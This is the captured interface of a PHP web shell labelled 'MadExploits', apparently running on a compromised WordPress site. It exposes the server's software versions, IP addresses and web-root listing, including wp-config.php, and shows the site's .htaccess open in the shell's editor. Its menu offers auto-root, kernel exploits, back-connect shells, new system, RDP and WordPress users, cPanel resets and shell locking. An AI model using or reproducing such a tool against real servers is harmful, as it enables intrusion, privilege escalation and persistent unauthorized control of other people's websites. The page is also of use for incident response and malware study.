Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.117.132.49
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2024 /
siamweeds.com /
[ HOME SHELL ]
Name
Size
Permission
Action
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
2.31
KB
-rwxr-xr-x
config.php
114
B
-rwxr-xr-x
generate_sitemap.php
2.92
KB
-rwxr-xr-x
index.php
1.83
KB
-rwxr-xr-x
license.txt
19.45
KB
-rwxr-xr-x
readme.html
7.24
KB
-rwxr-xr-x
sitemap.xml
78.65
KB
-rwxr-xr-x
wordfence-waf.php
325
B
-rwxr-xr-x
wp-activate.php
7.21
KB
-rwxr-xr-x
wp-blog-header.php
351
B
-rwxr-xr-x
wp-comments-post.php
2.27
KB
-rwxr-xr-x
wp-config-sample.php
3.26
KB
-rwxr-xr-x
wp-config.php
3.58
KB
-rwxr-xr-x
wp-cron.php
5.49
KB
-rwxr-xr-x
wp-links-opml.php
2.44
KB
-rwxr-xr-x
wp-load.php
3.84
KB
-rwxr-xr-x
wp-login.php
50.16
KB
-rwxr-xr-x
wp-mail.php
8.34
KB
-rwxr-xr-x
wp-settings.php
28.35
KB
-rwxr-xr-x
wp-signup.php
33.58
KB
-rwxr-xr-x
wp-trackback.php
4.98
KB
-rwxr-xr-x
xmlrpc.php
3.17
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# /var/www/website2024/siamweeds.com/.htaccess # เปิดใช้ Rewrite Engine (ถ้ามีซ้ำด้านล่าง ให้คงเพียงครั้งเดียว) RewriteEngine On # Force www to non-www # ผู้ใช้ที่เข้าผ่าน https://www.siamweeds.com/... → https://siamweeds.com/... RewriteCond %{HTTP_HOST} ^www\.siamweeds\.com$ [NC] RewriteRule ^(.*)$ https://siamweeds.com/$1 [R=301,L] # Strip ?add-to-cart=ID from URLs RewriteCond %{QUERY_STRING} (^|&)add-to-cart=\d+(&|$) [NC] RewriteRule ^(.*)$ /$1? [R=301,L] # Redirect 404 and 400 errors to the home page ErrorDocument 404 https://siamweeds.com/ ErrorDocument 400 https://siamweeds.com/ # Redirect /index to the root URL RewriteCond %{REQUEST_URI} ^/index/?$ [NC] RewriteRule ^index/?$ https://siamweeds.com/ [R=301,L] # Custom redirect for /bong/ to /product-category/bong/ RewriteRule ^bong/?$ https://siamweeds.com/product-category/bong/ [R=301,L] # Begin Really Simple Security Options -Indexes <IfModule mod_rewrite.c> RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / # Allow POST requests to admin-ajax.php RewriteCond %{REQUEST_URI} ^/wp-admin/admin-ajax\.php$ RewriteCond %{REQUEST_METHOD} ^POST$ RewriteRule ^(.*)$ - [L] # Block access to /my-account/ and /my-account/lost-password/ RewriteCond %{REQUEST_URI} ^/my-account/$ [OR] RewriteCond %{REQUEST_URI} ^/my-account/lost-password/$ RewriteRule ^(.*)$ / [R=302,L] # Block access to admin-ajax.php (only non-POST requests) RewriteCond %{REQUEST_URI} ^/wp-admin/admin-ajax\.php$ RewriteRule ^(.*)$ / [R=302,L] # Redirect to home for /wp-content/ or /wp-includes/ except .js, .css, .jpg, etc. RewriteCond %{REQUEST_URI} ^/wp-content/ [OR] RewriteCond %{REQUEST_URI} ^/wp-includes/ RewriteCond %{REQUEST_URI} !\.(js|css|jpg|jpeg|png|gif|webp|woff|woff2|ttf|svg|eot)$ RewriteRule ^(.*)$ / [R=302,L] RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule> # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress
Close